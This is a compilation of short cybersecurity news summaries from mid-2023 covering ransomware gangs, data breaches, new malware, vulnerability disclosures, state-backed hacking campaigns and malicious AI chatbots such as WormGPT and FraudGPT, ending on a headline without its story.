A cyberattack on MOVEit file-transfer servers since late May has affected over 637 organizations. German cybersecurity company KonBriefing reported this number. It includes groups directly hacked through their MOVEit servers and others connected to users of Progress Software's file-transfer tool. The Clop ransomware group, thought to be Russian, is behind the attacks. They've taken data with personal details of about 41 million people.

New SystemBC Malware Variant Targets Southern African Power Company

An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. ‘The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a south African nation's critical infrastructure,’ Kurt Baumgartner, principal security researcher at Kaspersky's Global Research and Analysis Team (GReAT), said.

New Statc Stealer Malware Emerges: Your Sensitive Data at Risk

Researchers at Zscaler recently disclosed details of a new information-stealing malware dubbed Statc Stealer that has been observed infecting Windows devices. Written in the C++ programming language, Statc Stealer is capable of performing filename discrepancy checks to prevent sandbox detection and reverse engineering analysis by security professionals.

Lapsus$ Hackers Took SIM-swapping Attacks to the Next Level

The U.S. government released a report after analyzing simple techniques, e.g. SIM swapping, used by the Lapsus$ extortion group to breach dozens of organizations with a strong security posture. Reviewing the group’s operations started in December last year following a long trail of incidents attributed to or claimed by Lapsus$ after leaking proprietary data from alleged victims.

Rhysida Ransomware Analysis Reveals Vice Society Connection

The newly surfaced Rhysida ransomware faction has swiftly become a concerning addition to the growing threat landscape. Its involvement in a series of impactful assaults since its emergence in May of this year has been linked to the well-known Vice Society ransomware group, which has been operating since 2021. Among the entities targeted by Rhysida are the Chilean Army and Prospect Medical Holdings. In a recent incident, the group’s attack had a far reaching impact, affecting 17 hospitals and 166 clinics across the United States.

Missouri Warns That Health Info Was Stolen in IBM MOVEit Data Breach

This week, the Missouri Department of Social Services (DSS) disclosed that Medicaid healthcare information was potentially exposed after IBM suffered a data breach. The attack was carried out by the Clop ransomware gang, which has been hacking vulnerable MOVEit Transfer servers worldwide by exploiting a SQL injection vulnerability (CVE-2023-34362) in the file transfer solution.

NIST Expands Cybersecurity Framework with New Pillar

The US National Institute of Standards and Technology (NIST) has released a new draft version of its popular best practice security framework, designed to expand its scope and provide more guidance on implementation. The NIST Cybersecurity Framework (CSF) 2.0 is the first refresh since it was launched in 2014. It is designed to help organizations “understand, reduce and communicate about cybersecurity risk,” the standards body said.

Evilproxy Phishing Campaign Targets 120,000 Microsoft 365 Users

EvilProxy has emerged as a widely used phishing platform for attacking MFA-secured accounts. According to Proofpoint’s recent findings, over 120,000 phishing emails have been sent to more than a hundred organizations in an attempt to compromise Microsoft 365 accounts. Proofpoint’s research highlights a significant increase in successful cloud account takeovers, especially affecting top-level executives, over the last five months.

Microsoft August 2023 Patch Tuesday Warns of 2 Zero-Days, 87 Flaws Summary:

As part of the August Patch Tuesday, Microsoft patched 87 flaws, two of which were actively exploited zero-days. In total, the tech giant released fixes for 18 Elevation of Privilege vulnerabilities, 3 Security Feature Bypass vulnerabilities, 23 Remote Code Execution vulnerabilities, 10 Information Disclosure vulnerabilities, 8 Denial of Service vulnerabilities, and 12 Spoofing vulnerabilities.

Notorious Phishing-as-a-Service Platform Shuttered

A phishing-as-a-service (PaaS) platform which may have been responsible for over 150,000 phishing domains has been taken offline after an Interpol-led operation, the policing group said. Interpol teamed up with investigators in Indonesia, Japan and the US and industry partners the Cyber Defense Institute, Group-IB, Palo Alto Networks Unit 42, Trend Micro and Cybertoolbelt to make the arrests.

LockBit Threatens to Leak Medical Data of Cancer Patients Stolen from Varian Medical Systems

The LockBit ransomware group has claimed responsibility for hacking Varian Medical Systems, a healthcare company that designs and manufactures medical devices and software for cancer treatment. The group threatens to leak medical data belonging to cancer patients. Varian Medical Systems operates globally and is owned by Siemens Healthineers, generating significant revenue.

Google Play Apps With 2.5M Installs Load Ads When Screen's Off

The Google Play store was infiltrated by 43 Android applications with 2.5 million installs that secretly displayed advertisements while a phone's screen was off, running down a device's battery. McAfee's Mobile Research Team discovered the malicious Android apps and reported them to Google as they violated Google Play Store's policies.

North Korean Hackers ‘Scarcruft’ Breached Russian Missile Maker

The cyberattack on the IT systems and email server of NPO Mashinostroyeniya, a Russian organization specializing in space rocket design and intercontinental ballistic missile engineering, has been attributed to the North Korean state sponsored hacking group ScarCruft. This group has a history of engaging in cyber activities with links to various targets.

Researchers Uncover New High-Severity Vulnerability in PaperCut Software

Horizon3 researchers recently disclosed a new high-severity vulnerability in PaperCut print management software for Windows that could result in remote code execution in certain configurations. Tracked as CVE-2023-39143, the flaw impacts PaperCut NG/MF prior to version 22.1.3. A successful exploit of CVE-2023-39143 could potentially allow unauthenticated attackers to read, delete, and upload arbitrary files to the PaperCut MF/NG application server.

Colorado Department of Higher Education Warns of Massive Data Breach

The Colorado Department of Higher Education (CDHE) discloses a massive data breach impacting students, past students, and teachers after suffering a ransomware attack in June. In a 'Notice of Data Incident' published on the CDHE website, the Department says they suffered a ransomware attack on June 19th, 2023. When ransomware gangs breach an organization, they quietly spread through a network while stealing sensitive data and files from computers and servers.

Clop Ransomware Now Uses Torrents to Leak Data and Evade Takedowns

The Clop ransomware gang has changed their extortion approach once more, now employing torrents to release the data they stole during MOVEit attacks. The ransomware gang started extorting victims on June 14 by gradually adding names to their Tor data leak site and eventually making the files public. However, the slow download speed on Tor sites limited the potential damage.

Russian Hacktivists Overwhelm Spanish Sites With DDoS

A leading Spanish research institute has become the latest organization in the country to come under cyber-attack from Russia, after a weeks-long DDoS campaign that appears to be geopolitically motivated. Local reports claimed that prolific hacktivist group NoName057 is responsible for the DDoS blitz, which impacted at least 72 websites between July 19 and 30.

New Acoustic Attack Steals Data from Keystrokes with 95% Accuracy

A team of researchers from British universities has developed a deep learning model called 'CoAtNet' that can perform acoustic attacks by stealing data from keyboard keystrokes recorded using a microphone. The model achieved an alarming accuracy of 95% in predicting the keystrokes, showcasing the potential danger of sound-based side-channel attacks. The study reveals that even when using platforms like Zoom for training, the prediction accuracy only dropped slightly to 93%, which is still a significant threat.

OT/IoT Malware Surges Tenfold in First Half of the Year

Malware-related cyber-threats in operational technology (OT) and Internet of Things (IoT) environments jumped tenfold year-on-year in the first six months of 2023, according to Nozomi Networks. In their latest “OT & IoT Security Report” the researchers shared ICS vulnerabilities, data from IoT honeypots and attack statistics from OT environments. “Specific to malware, denial-of-service (DoS) activity remains one of the most prevalent attacks against OT systems,” the vendor explained in a blog post announcing the report.

Hackers Use New Malware to Breach Air-gapped Devices in Eastern Europe

Chinese state-sponsored hackers have been targeting industrial organizations with new malware that can steal data from air-gapped systems. Air-gapped systems typically fulfill critical roles and are isolated from the enterprise network and the public internet either physically or through software and network devices. Researchers at cybersecurity company Kaspersky discovered the new malware and attributed it to the cyber-espionage group APT31, a.k.a. Zirconium.

Ransomware Attacks on Industrial Organizations Doubled in Past Year: Report

The number of ransomware attacks targeting industrial organizations and infrastructure has doubled since the second quarter of 2022, according to data from industrial cybersecurity firm Dragos. In a report analyzing data from the second quarter of 2023, Dragos said it saw 253 ransomware incidents, up 18% from the first quarter of 2023, when it observed 214 attacks.

Hackers Steal Signal, WhatsApp User Data With Fake Android Chat App

Hackers are using a fake Android app named 'SafeChat' to infect devices with spyware malware that steals call logs, texts, and GPS locations from phones. The Android spyware is suspected to be a variant of "Coverlm," which steals data from communication apps such as Telegram, Signal, WhatsApp, Viber, and Facebook Messenger. CYFIRMA researchers say the Indian APT hacking group 'Bahamut' is behind the campaign, with their latest attacks conducted mainly through spear phishing messages on WhatsApp that send the malicious payloads directly to the victim.

Experts Discovered a Previously Undocumented Initial Access Vector Used by P2PInfect Worm

In July, researchers from Palo Alto Networks Unit 42 discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers on Linux and Windows systems. P2PInfect is written in Rust and exploits the CVE-2022-0543 vulnerability to gain initial access. It establishes P2P communication to the network and has been found on over 307,000 unique public Redis systems in the past two weeks, with 934 possibly vulnerable. The worm's goal and the threat actors behind it remain unclear.

Cybercriminals Train AI Chatbots for Phishing, Malware Attacks

In the wake of WormGPT, a ChatGPT clone trained on malware-focused data, a new generative artificial intelligence hacking tool called FraudGPT has emerged, and at least another one is under development that is allegedly based on Google's AI experiment, Bard. Both AI-powered bots are the work of the same individual, who appears to be deep in the game of providing chatbots trained specifically for malicious purposes ranging from phishing and social engineering, to exploiting vulnerabilities and creating malware.

Experts Warn Attackers Started Exploiting Citrix ShareFile RCE Flaw CVE-2023-24489

Citrix ShareFile is a widely used cloud-based file-sharing application, which is affected by the critical remote code execution (RCE) tracked as CVE-2023-24489 (CVSS score of 9.1). The flaw impacts the customer-managed ShareFile storage zones controller, an unauthenticated, remote attacker can trigger the flaw to compromise the controller by uploading arbitrary file or executing arbitrary code.

CISA: New Submarine Malware Found on Hacked Barracuda ESG Appliances

In May, Network and email security firm Barracuda disclosed that a recently patched remote command injection zero-day vulnerability had been exploited since October 2022 to gain access to a subset of its Email Security Gateway appliances. The flaw tracked as CVE-2023-2868, was further exploited to deploy previously unknown malware dubbed Saltwater and SeaSpy as well as a malicious tool called SeaSide to establish reverse shells for easy remote access. In light of the attacks, Barracuda offered replacement devices to all affected customers at no charge.

Linux Version of Abyss Locker Ransomware Targets VMware ESXi Servers

The Abyss Locker operation is the latest to develop a Linux encryptor to target VMware's ESXi virtual machines platform in attacks on the enterprise. As the enterprise shifts from individual servers to virtual machines for better resource management, performance, and disaster recovery, ransomware gangs create encryptors focused on targeting the platform.

Experts Link AVRecon Bot to the Malware Proxy Service SocksEscort

In early July, researchers from Lumen Black Lotus Labs discovered the AVRecon botnet, which targeted small office/home office (SOHO) routers and infected over 70,000 devices across 20 countries. The threat actors behind the campaign aimed to build a botnet for various criminal activities, including password spraying and digital advertising fraud.

Microsoft Fixes WSUS Servers Not Pushing Windows 11 22H2 Updates

Microsoft fixed a known issue impacting WSUS (Windows Server Update Services) servers upgraded to Windows Server 2022, causing them not to push Windows 11 22H2 updates to enterprise endpoints. While the updates would successfully download to the WSUS server, they failed to propagate further to client devices. The root cause stems from the accidental removal of .msu and .wim MIME types during the upgrade process to Windows Server 2022.

BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities

The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in a new report published Thursday.

Zimbra Patches Zero-Day Vulnerability Exploited in XSS Attacks

Zimbra recently addressed a zero-day vulnerability that was exploited in attacks targeting Zimbra Collaboration Suite email servers. Tracked as CVE-2023-38750, the flaw relates to a case of reflected Cross-Site Scripting impacting Zimbra Collaboration Suite Version 8.8.15, which could enable threat actors to steal sensitive information or execute arbitrary code on vulnerable systems. The flaw was uncovered by security researcher Clément Lecigne of Google Threat Analysis Group and was initially disclosed to the public two weeks ago.

High Severity Vulnerabilities Discovered in Ninja Forms Plugin

Multiple critical vulnerabilities have been detected in Ninja Forms. a widely used WordPress forms builder plugin with more than 900,000 active installations. The plugin, created by Saturday Drive, enables users to generate a wide range of forms such as contact forms, event registration, file uploads, and payments. Security researchers from Patchstack published a new advisory revealing the presence of the first vulnerability which is a reflected cross site scripting flaw based on POST requests.

BreachForums Database and Private Chats for Sale in Hacker Data Breach

While consumers are usually the ones worried about their information being exposed in data breaches, it's now the hacker's turn, as the notorious Breached cybercrime forum's database is up for sale and member data has been shared with Have I Been Pwned. Yesterday, the Have I Been Pwned data breach notification service announced that visitors can check if their information was exposed in a data breach of the Breached cybercrime forum.

Australia and US Issue Warning About Web App Threats

The Australian and US governments have issued a joint advisory about the growing cyber-threats to web applications and application programming interfaces (APIs). The guidance, Preventing Web Application Access Control Abuse was released by the Australian Cyber Security Centre (ACSC), US Cybersecurity and Infrastructure Security Agency (CISA), and US National Security Agency (NSA) on July 27, 2023/

Repeatable VEC Attacks Target Critical Infrastructure

The incidence of vendor email compromise attacks has surged, as recent data reveals a significant uptick in these cyber threats. A new report released yesterday by Abonormal Security, a cybersecurity firm, highlight the growing risk posed by VEC attacks, which are a variant of business email compromise.

New Nitrogen Malware Pushed via Google Ads For Ransomware Attacks

A new 'Nitrogen' initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads. The goal of the Nitrogen malware is to provide the threat actors initial access to corporate networks, allowing them to conduct data-theft, cyberespionage, and ultimately deploying the BlackCat/ALPHV ransomware.

NATO Investigates Alleged Data Theft by SiegedSec Hackers

NATO has confirmed that its IT team is investigating claims about an alleged data-theft hack on the Communities of Interest (COI) Cooperation Portal by a hacking group known as SiegedSec. The COI Cooperation Portal (dnbl.ncia.nato.int) is the military alliance's unclassified information-sharing and collaboration environment, dedicated to supporting NATO organizations and member nations. Yesterday, the hacking group 'SiegedSec' posted on Telegram what they claimed to be hundreds of documents stolen from the COI Cooperation Portal.

FraudGPT, A New Malicious Generative AI Tool Appears in the Threat Landscape

Generative AI models are becoming very attractive for crooks, Netenrich researchers recently spotted a new platform dubbed FraudGPT which is advertised on multiple marketplaces and the Telegram Channel since July 22, 2023. According to Netenrich, this generative AI bot was trained for offensive purposes, such as creating spear phishing emails, conducting BEC attacks, cracking tools, and carding.

Microsoft Previews Defender for IoT Firmware Analysis Service

Microsoft announced a new Defender for IoT feature that will allow analyzing the firmware of embedded Linux devices like routers for security vulnerabilities and common weaknesses. Dubbed Firmware Analysis and now available in Public Preview, the new capability can detect a wide range of weaknesses, from hardcoded user accounts and outdated or vulnerable open-source packages to the use of a manufacturer's private cryptographic signing key.

ALPHV Ransomware Adds Data Leak API in New Extortion Strategy

ALPHV ransomware gang, aka BlackCat, is now providing an API for their leak site to increase visibility for their attacks. Earlier this week, several researchers spotted a new page within the BlackCat leak site with instructions for using their API to collect timely updates about new victims. APIs, or Application Programming Interfaces, are typically used to enable communication between two software components based on agreed definitions and protocols .

VMware fixes bug exposing CF API admin credentials in Audit Logs

VMware recently fixed an information disclosure bug impacting its VMware Tanzu Application service for VMs (TAS for VMs) and Isolation Segment. “TAS for VMs helps enterprises automate the deployment of applications across on-premises or public and private clouds (e.g., vSphere, AWS, Azure, GCP, OpenStack). Tracked as CVE-2023-20891, the issue seems to be caused by credentials being logged and exposed via system audit logs.

Critical Vulnerabilities Found in Radio Encryption System

Security experts have discovered numerous vulnerabilities in a widely employed radio communication system, which is extensively used by law enforcement and critical infrastructure for transmitting data. These vulnerabilities could potentially enable remote decryption of cryptographically protected communications. Five vulnerabilities in Terrestrial Trunked Radio, a European radio communication standard have been identified by researchers from the Dutch security firm Midnight Blue.

Super Admin Elevation Bug Puts 900,000 MikroTik Devices at Risk

A critical severity 'Super Admin' privilege elevation flaw puts over 900,000 MikroTik RouterOS routers at risk, potentially enabling attackers to take full control over a device and remain undetected. The flaw, CVE-2023-30799, allows remote attackers with an existing admin account to elevate their privileges to "super-admin" via the device's Winbox or HTTP interface.

Over 400,000 Corporate Credentials Stolen by Info-stealing Malware

The analysis of nearly 20 million information-stealing malware logs sold on the dark web and Telegram channels revealed that they had achieved significant infiltration into business environments. Information stealers are malware that steals data stored in applications such as web browsers, email clients, instant messengers, cryptocurrency wallets, FTP clients, and gaming services. The stolen information is packaged into archives called 'logs,' which are then uploaded back to the threat actor for use in attacks or sold on cybercrime marketplaces.

Biden-Harris Administration Secures AI Commitments For Safety

The Biden-Harris Administration has taken a new step towards ensuring the responsible development of artificial intelligence (AI) technology by securing voluntary commitments from leading AI companies. As part of the new initiative, Amazon, Anthropic, Google, Inflection, Meta, Microsoft and OpenAI have pledged to prioritize safety, security and trust in their AI systems.

Norway Says Ivanti Zero-Day Was Used to Hack Govt IT Systems

The Norwegian National Security Authority (NSM) has confirmed that attackers used a zero-day vulnerability in Ivanti's Endpoint Manager Mobile (EPMM) solution to breach a software platform used by 12 ministries in the country. The Norwegian Security and Service Organization (DSS) said on Monday that the cyberattack did not affect Norway's Prime Minister's Office, the Ministry of Defense, the Ministry of Justice, and the Ministry of Foreign Affairs.

Lazarus Hackers Hijack Microsoft IIS Servers to Spread Malware

The Lazarus hacking group, sponsored by the North Korean state, is currently involved in breaching Windows Internet Information Service (IIS) web servers with the intention of taking control of these servers for distributing malware. IIS is a web server solution developed by Microsoft, commonly used to host websites or application services, including Microsoft Exchange’s Outlook on the web.

Clop Now Leaks Data Stolen in MoveIT Attacks on Clearweb Sites

The Clop ransomware group is emulating the tactics of the ALPHV ransomware gang by constructing dedicated internet accessible websites for individual victims. “To overcome these obstacles, last year, the ALPHV ransomware operation, also known as BlackCat, introduced a new extortion tactic of creating clearweb websites to leak stolen data that were promoted as a way for employees to check if their data was leaked.

New Variant of AsyncRAT Malware Spreading Through Pirated Software

According to researchers at Avast, a new variant of AsyncRAT is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. Dubbed HotRat, the remote access trojan has been seen in the wild since October 2022, with majority of the infections being located in Thailand, Guyana, Libya, Suriname, Mali, Pakistan, Cambodia, South Africa, and India. The attack chain disclosed by Avast entails bundling cracked software available online via torrent sites with a malicious AutoHotKey (AHK script).

New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection

Qualys Threat Research Unit recently uncovered a remote code execution vulnerability impacting OpenSSH’s forwarded ssh-agent, a background program that maintains users' keys in memory and facilitates remote logins to a server without having to enter their passphrase again. Tracked as CVE-2023-38408, the vulnerability impacts OpenSSH before 9.3p2 and can be exploited to execute arbitrary commands on vulnerable OpenSSH’s forwarded ssh-agent. A successful exploit requires certain libraries to be present on the victim system and that the SSH authentication agent is forwarded to an attacker-controlled system.

Experts Warn of OSS Supply Chain Attacks Against the Banking Sector

In the first half of 2023, Checkmarx researchers detected multiple open-source software supply chain attacks aimed at the banking sector. These attacks targeted specific components in web assets used by banks, according to the experts the attackers used advanced techniques. A threat actor leverage the NPM platform to upload malicious packages that included malicious objects upon installation.

Critical AMI MegaRAC Bugs Can Let Hackers Brick Vulnerable Servers

Recently, American Megatrends International, a hardware and software company, identified two critical severity vulnerabilities in their MegaRAC Baseboard Management Controller software. The MegaRac BMC software is designed to offer administrators “out of band” and “lights out” remote system management capabilities. This functionality allows administrators to troubleshoot servers as if they were physically present in front of the devices, even when operating remotely.

VirusTotal Apologizes For Data Leak Affecting 5,600 Customers

VirusTotal apologized on Friday for leaking the information of over 5,600 customers after an employee mistakenly uploaded a CSV file containing their info to the platform last month. The data leak impacted only Premium account customers, with the uploaded file containing their names and corporate email addresses. Emiliano Martines, the online malware scanning service's head of product management, also assured impacted customers that the incident was caused by human error and was not the result of a cyber-attack or any vulnerability with VirusTotal.

DDoS Botnets Hijacking Zyxel Devices to Launch Devastating Attacks

Researchers at FortiGuard Labs have observed several distributed denial-of-service botnets exploiting a critical flaw in Zyxel devices to gain remote control of vulnerable systems. Tracked as CVE-2023-28771, the vulnerability is related to a command injection bug affecting multiple firewall models that could enable an unauthorized actor to execute arbitrary code via specially crafted packets sent to the targeted appliance.

Chinese APT41 Linked to WyrmSpy and DragonEgg Surveillanceware

Researchers at Lookout released a report on July 19, 2023, revealing that the Chinese espionage group APT41 is associated with the advanced Android surveillanceware known as WyrmSpy and DragonEgg. The report emphasized APT41’s well documented past of conducting espionage and seeking financial advantages by targeting government institutions and private companies.

Adobe Emergency Patch Fixes New ColdFusion Zero-Day Used in Attacks

Adobe recently published an emergency ColdFusion security update that addressed several vulnerabilities, including a new zero-day that was exploited in attacks in the wild. The zero-day tracked as CVE-2023-38205 is being described as an instance of improper access control that could result in a security bypass. Two other flaws were addressed, one of which was rated critical in severity while the other was rated medium in severity.

JumpCloud Breach Traced Back to North Korean State Hackers

US-based enterprise software company JumpCloud was breached by North Korean Lazarus Group hackers, according to security researchers at SentinelOne and CrowdStrike. In a report published on Thursday, SentinelOne Senior Threat Researcher Tom Hegel linked the North Korean threat group to the JumpCloud hack based on multiple indicators of compromise shared by the company in a recent incident report.

drIBAN Fraud Operations Target Corporate Banking Customers

Threats actors have extensively employed an advanced web-inject kit known as drlBAN to orchestrate fraudulent assaults on corporate banking institutions and their customers. As stated in a recent advisory from Cleafy security researchers, drlBAN was initially discovered in 2019. It utilizes customized JavaScript code to specifically target different entities within the corporate banking sector. Functioning as part of a Man-in-the-Browser attack, these web injects enable cyber criminals to manipulate the content of legitimate web pages in real time, circumventing the TLS protocol.

Ukraine Takes Down Massive Bot Farm, Seizes 150,000 SIM Cards

Ukraine’s Cyber Police Department has dismantled another massive bot farm linked to more than 100 individuals after researching nearly two dozen locations. The bots were allegedly used to promote Russian propaganda, justifying Russia’s invasion of Ukraine. The bots were also leveraged to spread illegal content and personal information and conduct other fraudulent activities.

Cybersecurity Firm Sophos Impersonated by New SophosEncrypt Ransomware

Cybersecurity researcher MalwareHunterTeam recently uncovered a new ransomware as a service (RaaS) dubbed SophosEncrypt which is allegedly impersonating Sophos. MalwareHunterTeam Initially thought SophosEncrypt to be part of a red team exercise by Sophos, however, Sophos followed up on Twitter stating that they did not create the encryptor and are conducting an investigation. Taking a closer look at the sample uncovered by MalwareHunterTeam, the encryptor is written in the Rust programming language.

Security Alert: Social Engineering Campaign Targets Technology Industry Employees

GitHub has identified a low-volume social engineering campaign targeting personal accounts of employees in technology firms. The attackers use GitHub repository invitations and malicious npm package dependencies. The targets are often associated with blockchain, cryptocurrency, online gambling, or cybersecurity sectors. The threat actor behind this campaign is likely linked to North Korean objectives and has been identified as Jade Sleet or TraderTraitor.

U.S. Preparing Cyber Trust Mark for More Secure Smart Devices

A new cybersecurity certification and labeling program called U.S. Cyber Trust Mark is being shaped to help U.S. consumers choose connected devices that are more secure and resilient to hacker attacks. A proposal from the Federal Communications Commission, the program is expected to roll out next year with smart device vendors committing to it voluntarily.

Hackers Exploiting Critical WordPress Woocommerce Payments Bug

A critical vulnerability in the widely used WooCommerce Payments plugin is being exploited by hackers, enabling them to gain unauthorized privileges of any user, including administrators, on vulnerable WordPress installations. WooCommerce Payments is a highly popular WordPress plugin that facilitates credit and debit card payments in WooCommerce stores, with over 600,000 active installations as, reported by WordPress.

Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware

An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews. Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022.

Meet NoEscape: Avaddon ransomware gang's likely successor

The new NoEscape ransomware operation is believed to be a rebrand of Avaddon, a ransomware gang that shut down and released its decryption keys in 2021. NoEscape launched in June 2023 when it began targeting the enterprise in double-extortion attacks. As part of these attacks, the threat actors steal data and encrypt files on Windows, Linux, and VMware ESXi servers. The threat actors then threaten to publicly release stolen data if a ransom is not paid. BleepingComputer is aware of NoEscape ransomware demands ranging between hundreds of thousands of dollars to over $10 million. Like other ransomware gangs, NoEscape does not allow its members to target CIS (ex-Soviet Union) countries, with victims from those countries receiving free decryptors and information on how they were breached.

Google Cloud Build Bug Lets Hackers Launch Supply Chain Attacks

A critical design flaw in Google Cloud Build has been discovered by cloud security firm Orca Security, allowing hackers to launch supply chain attacks. The flaw, named Bad.Build, enables attackers to escalate privileges and gain unauthorized access to Google Artifact Registry code repositories. By impersonating the service account for Google Cloud Build, threat actors can run API calls against the artifact registry, inject malicious code into applications, and potentially compromise the entire supply chain.

FIN8 Deploys ALPHV Ransomware Using Sardonic Malware Variant

A financially motivated cybercrime gang has been observed deploying BlackCat ransomware payloads on networks backdoored using a revamped Sardonic malware version. Tracked as FIN8 (aka Syssphinx), this threat actor has been actively operating since at least January 2016, focusing on targeting industries such as retail, restaurants, hospitality, healthcare, and entertainment.

CERT-UA Uncovers Gamaredon's Rapid Data Exfiltration Tactics Following Initial Compromise

Last week, the computer emergency response team of Ukraine (CERT-UA) released an article disclosing details about a Russian-linked threat actor known as Gamaredon (Aka Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010). Active since at least 2013, Gamaredon is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014.

AI Tool WormGPT Enables Convincing Fake Emails For BEC Attacks

New research conducted by security firm SlashNext reveals that cyber-criminals are utilizing a potent tool called WormGPT, a generative AI system, for carrying out business email compromise (BEC) attacks. Security expert Daniel Kelley, observed a worrisome trend in online forums where cyber-criminals are offering “jailbreaks” for interfaces like ChatGPT. These jailbreaks are specialized prompts that aim to exploit ChatGPT by manipulating it to generate outputs involving sensitive information disclosure, inappropriate content generation, or even the execution of harmful code.

JumpCloud Discloses Breach by State-Backed APT Hacking Group

US-based enterprise software firm JumpCloud has disclosed a breach by a state-backed hacking group that occurred almost one month ago. The attack was highly targeted and focused on a limited set of customers. The breach was discovered on June 27 after the attackers gained access through a spear-phishing attack. Although no evidence of customer impact was found initially, JumpCloud decided to rotate credentials and rebuild compromised infrastructure.

A Deep Dive into the Packet Reflection Vulnerability Allowing Attackers to Plague Private 5G Network

5G technology has bolstered productivity in modern-day factories, allowing multiple devices to be connected simultaneously, but 5G networks are not immune to cyberattacks. In our recent joint research effort with CTOne and the Telecom Technology Center (TTC), the official advisory group to Taiwan's National Communications Commission and Ministry of Digital Affairs, Trend Micro looked into ZDI-CAN-18522, a packet reflection vulnerability in the UPF of 5G cores (5GC).

Colorado State University says data breach impacts students, staff

Colorado State University (CSU) has confirmed that the Clop ransomware operation stole sensitive personal information of current and former students and employees during the recent MOVEit Transfer data-theft attacks. Colorado State University is a public research university with nearly 28,000 students and 6,000 academic and administrative staff members, operating on an endowment of $558,000,000.

New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries

A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries. Lumen Black Lotus Labs has dubbed the malware AVrecon, making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year.

Cisco SD-WAN vManage Impacted by Unauthenticated REST API Access

The Cisco SD-WAN vManage management software is impacted by a flaw that allows an unauthenticated, remote attacker to gain read or limited write permissions to the configuration of the affected instance. Cisco SD-WAN vManage is a cloud-based solution allowing organizations to design, deploy, and manage distributed networks across multiple locations.

Popular WordPress Security Plugin Caught Logging Plaintext Passwords

A popular WordPress plugin dubbed All-In-One Security (AIOS) was found to log plaintext passwords from login attempts. With over one million installs on WordPress sites, AIOS is a security and firewall plugin designed to log user activity and prevent cyberattacks such as brute-force attempts by warning admins when the default admin username is used for login. Approximately two weeks ago, user reports started coming in about an insecure design flaw in the plugin.

Russian State Hackers Lure Western Diplomats With BMW Car Ads

The Russian state-backed hacking collective known as APT29 has been employing unique tactics such as offering car listings to attract diplomats in Ukraine into clicking on harmful links, which ultimately distribute malware. APT29 is affiliated with Russia’s Foreign Intelligence Service (SVR), and it has gained notoriety for executing multiple cyber-espionage operations aimed at influential individuals worldwide.

Fortinet Warns of Critical RCE flaw in FortiOS, FortiProxy Devices

Fortinet recently disclosed a critical severity flaw impacting FortiOS and FortiProxy that could enable remote attackers to execute arbitrary code on vulnerable devices. Tracked as CVE-2023-33308, the flaw was uncovered to disclosed to Fortinet by cybersecurity firm Watchtowr. According to Fortinet, CVE-2023-33308 relates to a stack-based overflow vulnerability and could allow a remote attacker to execute arbitrary code or command via crafted packets reaching proxy policies or firewall policies with proxy mode alongside SSL deep packet inspection.

Microsoft July 2023 Patch Tuesday Warns of 6 Zero-Days, 132 Flaws

As part of the July Patch Tuesday, Microsoft addressed 132 vulnerabilities, six of which were actively exploited zero-days. In total, there were 33 Elevation of Privilege Vulnerabilities, 13 Security Feature Bypass Vulnerabilities, 37 Remote Code Execution Vulnerabilities, 19 Information Disclosure Vulnerabilities, 22 Denial of Service Vulnerabilities, and 7 Spoofing Vulnerabilities. Out of the 132 flaws addressed, nine have been rated critical in severity.

Ransomware Payments on Record-Breaking Trajectory for 2023

Data from the first half of the year indicates that ransomware activity is on track to break previous records, seeing a rise in the number of payments, both big and small. According to a report by blockchain analysis firm Chainalysis, ransomware is the only cryptocurrency crime category seeing a rise this year, with all others, including hacks, scams, malware, abuse material sales, fraud shops, and darknet market revenue, recording a steep decline, "In fact, ransomware attackers are on pace for their second-biggest year ever, having extorted at least $449.1 million through June."

Experts Released PoC exploit for Ubiquiti EdgeRouter Flaw

A Proof-of-Concept (PoC) exploit for the CVE-2023-31998 vulnerability in the Ubiquiti EdgeRouter has been publicly released. The CVE-2023-31998 flaw (CVSS v3 5.9) is a heap overflow issue impacting Ubiquiti EdgeRouters and Aircubes, an attacker can exploit it to potentially execute arbitrary code and interrupt UPnP service to a vulnerable device.

Owncast, EaseProbe Security Vulnerabilities Revealed

Oxeye has uncovered two critical security vulnerabilities and recommends immediate action to mitigate risk. The vulnerabilities were discovered in Owncast (CVE-2023-3188) and EaseProbe (CVE-2023-33967), two open-source platforms written in Go. The first vulnerability was discovered in Owncast, an open-source, self-hosted, decentralized, single-user live video streaming and chat server written in Go.

VMware Warns of Exploit Available for Critical vRealize RCE Bug

VMware warned customers today that exploit code is now available for a critical vulnerability in the VMware Aria Operations for Logs analysis tool, which helps admins manage terabytes worth of app and infrastructure logs in large-scale environments. The flaw (CVE-2023-20864) is a deserialization weakness patched in April, and it allows unauthenticated attackers to gain remote execution on unpatched appliances.

RomCom RAT Targeting NATO and Ukraine Support Groups

The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the upcoming NATO Summit in Vilnius as well as an identified organization supporting Ukraine abroad. The findings come from the BlackBerry Threat Research and Intelligence team, which found two malicious documents submitted from a Hungarian IP address on July 4, 2023.

New TOITOIN Banking Trojan Targeting Latin American Businesses

